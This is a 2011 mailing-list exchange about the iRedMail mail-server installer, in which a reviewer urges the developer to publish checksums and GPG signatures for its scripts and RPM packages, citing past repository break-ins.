On Tue, Jun 28, 2011 at 10:28 AM, Zhang Huangbin
<[log in to unmask]> wrote:
>
> On Jun 28, 2011, at 9:24 PM, Nico Kadel-Garcia wrote:
>>
>>> iRedMail is just shell scripts, it will install and configure mail server
>>> related components automatically for you. That's why i call it a 'solution'
>>> instead of a 'software'. Source code of iRedMail is available in Google
>>> Code: http://code.google.com/p/iredmail/source/list
>>
>> And the *source* should be published
>
>
> iRedMail installer is shell scripts, that means it's source code too.

It's not published that way. See my previous comments about checksums
and GPG signatures. It's too easy, historically, to steal a domain or
steal access to a software repository and change the source code
without signatures. Dig back the the SSH vulnerabilities in SSHD that
were used against sourceforge.net roughly..... 12 years ago? And the
more recent break-ins to our favorite upstream vendor's build machines
that caused re-signing of RPM's and new keys published.

>>> Used major components:
>>
>> Good. Now put that on your web page, please.
>
>
> It's now listed in home page of web site: http://www.iredmail.org/
> Thanks for your suggestion.

Cool.

>
>> Even if I distruct your product outright due to these missing
>> features, I'm happy for people to learn how to do these security
>> practices better.
>
>
> Thanks very much for your comments and time, will try to improve it. :)

I'm cheered and pleased by your quick response to those concerns.
While it's not a tool I, personally, need right now, I'll keep it in
mind as worth investigating for peoople who haven't already hammered
their way through all those individual components.

I do urge you to review GPG signature handling, especially for RPM
packages. It can be integrated well with the updated versions of
'mock' available for SL 6.